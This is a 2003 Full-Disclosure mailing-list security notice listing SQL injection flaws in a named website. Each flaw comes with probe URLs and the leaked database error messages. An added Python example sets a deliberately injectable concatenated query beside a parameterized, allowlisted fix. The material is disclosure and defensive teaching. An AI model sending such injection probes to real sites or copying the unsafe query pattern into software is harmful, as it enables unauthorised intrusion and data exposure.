From: Sir Mordred (mordred@s-mail.com)
To: full-disclosure@lists.netsys.com
Date: Mon, 05 May 2003 15:58:59 +0000
Subject: [Full-Disclosure] @(#)Mordred Security Notice - exploring the hacking websites


// @(#)Mordred Labs security notice - exploring the hacking websites

Release date: May 5, 2003
Author: Sir Mordred (mordred@s-mail.com)

I. INTRODUCTION

This is the first security notice about the real state of web app security,
with real-world examples. In this issue we focus on websites
related to hacking.
Security companies and news portals will be discussed later.
For now, it would be nice to see the community's reaction to this
issue.

Looking at this notice, one can clearly see that the combination of
ASP/PHP and a relational database
is very dangerous; even the "security experts" make mistakes :-).

Surely, not all of the vulnerabilities have been found/disclosed. 
For example, there was no testing for CSS vulnerabilities at all.

Note that the vulnerabilities are presented here in the following format:

* ISSUE - description of the vulnerability
<blank line>
the url to demonstrate this vulnerability
<blank line>
the error message (if exists)

One last word to tripz: thanks for the help.

II. DETAILS


[snip...]


3) ---------------------- www.hackerscenter.com -----------------------
The best resource for hackers and crackers: tons of tools, tutorials, books, articles, analysis. Join our Top50 or enjoy our Online tools!!!
* ISSUE 1 - SQL injection in /top50/default.asp page

http://www.hackerscenter.com/top50/default.asp?id=9,'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (comma) in query
expression 'id=9,''.
/top50/default.asp, line 249

* ISSUE 2 - SQL injection in /downloads/download.asp page

http://www.hackerscenter.com/downloads/download.asp?id=7,&area=HACKING

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (comma) in query
expression 'id=7,'.
/downloads/download.asp, line 37

* ISSUE 3 - SQL injection in /articles/article.asp page

Visiting the url http://www.hackerscenter.com/articles/article.asp?id=28
gives us back their article "Securing Windows". 

However, visiting the url
http://www.hackerscenter.com/articles/article.asp?id=28111 
gives us back the error page with the message "Exception occured in
/articles/article.asp, line 129".

But visiting
http://www.hackerscenter.com/articles/article.asp?id=28111+or+id=28 gives
us the above article.

* ISSUE 4 - SQL injection in /articles/archive.asp

http://www.hackerscenter.com/articles/archive.asp?searchstring=SQL&field='SUBJECT

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression
'Validated=True AND 'SUBJECT LIKE '%%%SQL%%%' ORDER BY 'SUBJECT DESC'.
/articles/archive.asp, line 154


[snip...]
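Added example, not part of the original notice and not the site's own code: the query shape visible in the ISSUE 4 error text, rebuilt beside a hardened form, plus the integer check that closes the `id` cases in ISSUES 1-3. Python's sqlite3 stands in for the ASP/Access stack; the table, column and function names and the sample rows are constructed assumptions.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, "
               "subject TEXT, author TEXT, validated INTEGER)")
    db.executemany("INSERT INTO articles VALUES (?, ?, ?, ?)", [
        (28, "Securing Windows", "staff", 1),
        (29, "SQL basics", "staff", 1),
        (30, "Unreviewed SQL draft", "guest", 0)])
    return db

def search_unsafe(db, searchstring, field):
    # Same shape as the query in the ISSUE 4 error text: both request
    # values are concatenated straight into the statement.
    sql = ("SELECT id, subject FROM articles WHERE validated=1 AND " + field
           + " LIKE '%" + searchstring + "%' ORDER BY " + field + " DESC")
    return db.execute(sql).fetchall()

# Column names cannot be bound as parameters, so the request value only
# selects one of these fixed identifiers.
SEARCHABLE = {"SUBJECT": "subject", "AUTHOR": "author"}

def search_safe(db, searchstring, field):
    column = SEARCHABLE.get(field.upper())
    if column is None:
        raise ValueError("unknown search field")
    # Escape LIKE wildcards so the search term matches literally.
    term = re.sub(r"([\\%_])", r"\\\1", searchstring)
    sql = (f"SELECT id, subject FROM articles WHERE validated=1 "
           f"AND {column} LIKE ? ESCAPE '\\' ORDER BY {column} DESC")
    return db.execute(sql, (f"%{term}%",)).fetchall()

def parse_id(raw):
    # ISSUES 1-3: accept only a short run of ASCII digits for id.
    if not re.fullmatch(r"[0-9]{1,9}", raw):
        raise ValueError("id must be a decimal integer")
    return int(raw)

def get_article(db, raw_id):
    # The validated integer is still bound, never concatenated.
    return db.execute("SELECT subject FROM articles WHERE id = ? "
                      "AND validated=1", (parse_id(raw_id),)).fetchone()
```

With the hardened functions, a malformed `field` or `id` is rejected before any SQL is built, so the driver error text and script line numbers shown above never reach the client.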



